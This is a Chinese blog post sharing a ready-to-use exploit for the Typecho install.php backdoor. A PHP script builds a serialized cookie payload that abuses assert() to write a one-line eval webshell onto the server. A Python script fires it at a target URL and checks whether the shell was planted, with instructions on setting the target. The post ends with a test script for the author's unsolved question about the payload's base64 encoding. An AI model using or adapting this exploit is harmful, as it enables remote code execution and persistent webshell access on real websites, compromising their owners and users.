Typecho预留后门exp

(来源)[https://mp.weixin.qq.com/s/kra9OUpwCC7zotDVUmGWyQ]

exp.php:

<?php

/**
* Created by PhpStorm.
* User: RaI4over
* Date: 2017/10/19
* Time: 15:17
* 生成 _typecho_config 的值
*/
class Typecho_Feed
{
    const RSS2 = 'RSS 2.0';
    private $_type;
    private $_charset;
    private $_lang;
    private $_items = array();

    public function __construct($version, $type = self::RSS2, $charset = 'UTF-8', $lang = 'en')
    {
        $this->_version = $version;
        $this->_type = $type;
        $this->_charset = $charset;
        $this->_lang = $lang;
    }

    public function addItem(array $item)
    {
        $this->_items[] = $item;
    }
}

class Typecho_Request
{
    private $_params = array('screenName'=>'fputs(fopen(\'./a.php\',\'w\'),\'<?php @eval($_POST[minty]);?>\')');
    private $_filter = array('assert');
    //private $_filter = array('assert', array('Typecho_Response', 'redirect'));

}

$payload1 = new Typecho_Feed(5, 'ATOM 1.0');
$payload2 = new Typecho_Request();
$payload1->addItem(array('author' => $payload2));
$exp['adapter'] = $payload1;
$exp['prefix'] = 'MxxY';
echo base64_encode(serialize($exp));

exp.py:

import requests
import os

if __name__ == '__main__':
    print ''' ____          ____      _ _  _
| __ ) _  _  |  _ \ __ _(_) || |  _____  _____ _ __
|  _ \| | | |  | |_) / _` | | || |_ / _ \ \ / / _ \ '__|
| |_) | |_| |  |  _ < (_| | |__  _| (_) \ V /  __/ |
|____/ \__, |  |_| \_\__,_|_|  |_|  \___/ \_/ \___|_|
      |___/
    '''

    targert_url = 'https://xxxxx';

    rsp = requests.get(targert_url + "/install.php");
    if rsp.status_code != 200:
        exit('The attack failed and the problem file does not exist !!!')
    else:
        print 'You are lucky, the problem file exists, immediately attack !!!'

    proxies = {"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080", }

    typecho_config = os.popen('php exp.php').read()

    headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0',
              'Cookie': 'antispame=1508415662; antispamkey=cc7dffeba8d48da508df125b5a50edbd; PHPSESSID=po1hggbeslfoglbvurjjt2lcg0; __typecho_lang=zh_CN;__typecho_config={typecho_config};'.format(typecho_config=typecho_config),
              'Referer': targert_url}

    url = targert_url + "/install.php?finish=1"

    requests.get(url,headers=headers,allow_redirects=False)

    shell_url = targert_url + '/a.php'
    if requests.get(shell_url).status_code == 200:
        print 'shell_url: ' + shell_url
    else:
        print "Getshell Fail!"

  • 将exp.php和exp.py放至同级目录,修改exp.py中的target_url为目标url
  • 一句话木马内容和路径可在exp.php中修改,修改后同样需要修改exp.py中的路径

另外

我在尝试修改exp时,想不使用php去获得payload,于是将执行php exp.php之后输出的base64编码还原为原文,但是在再次使用base64进行编码的时候发现编码后的base64值与之前的不一致,不知道为什么

测试脚本如下

import base64

str="YToyOntzOjc6ImFkYXB0ZXIiO086MTI6IlR5cGVjaG9fRmVlZCI6NTp7czoxOToiAFR5cGVjaG9fRmVlZABfdHlwZSI7czo4OiJBVE9NIDEuMCI7czoyMjoiAFR5cGVjaG9fRmVlZABfY2hhcnNldCI7czo1OiJVVEYtOCI7czoxOToiAFR5cGVjaG9fRmVlZABfbGFuZyI7czoyOiJlbiI7czoyMDoiAFR5cGVjaG9fRmVlZABfaXRlbXMiO2E6MTp7aTowO2E6MTp7czo2OiJhdXRob3IiO086MTU6IlR5cGVjaG9fUmVxdWVzdCI6Mjp7czoyNDoiAFR5cGVjaG9fUmVxdWVzdABfcGFyYW1zIjthOjE6e3M6MTA6InNjcmVlbk5hbWUiO3M6ODA6ImZwdXRzKGZvcGVuKCcuL3Vzci90aGVtZXMvZGVmYXVsdC9pbWcvdGV3LnBocCcsJ3cnKSwnPD9waHAgQGV2YWwoJF9QT1NUW3hdKTs/PicpIjt9czoyNDoiAFR5cGVjaG9fUmVxdWVzdABfZmlsdGVyIjthOjE6e2k6MDtzOjY6ImFzc2VydCI7fX19fXM6ODoiX3ZlcnNpb24iO2k6NTt9czo2OiJwcmVmaXgiO3M6ODoiUmFpNG92ZXIiO30="

str2=base64.b64decode(str)

print str2

code="""a:2:{s:7:"adapter";O:12:"Typecho_Feed":5:{s:19:"Typecho_Feed_type";s:8:"ATOM 1.0";s:22:"Typecho_Feed_charset";s:5:"UTF-8";s:19:"Typecho_Feed_lang";s:2:"en";s:20:"Typecho_Feed_items";a:1:{i:0;a:1:{s:6:"author";O:15:"Typecho_Request":2:{s:24:"Typecho_Request_params";a:1:{s:10:"screenName";s:80:"fputs(fopen('./usr/themes/default/img/tew.php','w'),'<?php @eval($_POST[x]);?>')";}s:24:"Typecho_Request_filter";a:1:{i:0;s:6:"assert";}}}}s:8:"_version";i:5;}s:6:"prefix";s:8:"Rai4over";}"""

str3 =base64.b64encode(code)

print str3==str

很迷。。可能是编码问题?
解决之后再更新吧。。


*转载请注明来自AresX’s Blog

本博客采用 知识共享署名-非商业性使用-相同方式共享 4.0 国际许可协议(CC BY-NC-SA 4.0) 发布.转载请注明出处
本文链接:https://ares-x.com/2017/10/28/Typecho预留后门exp/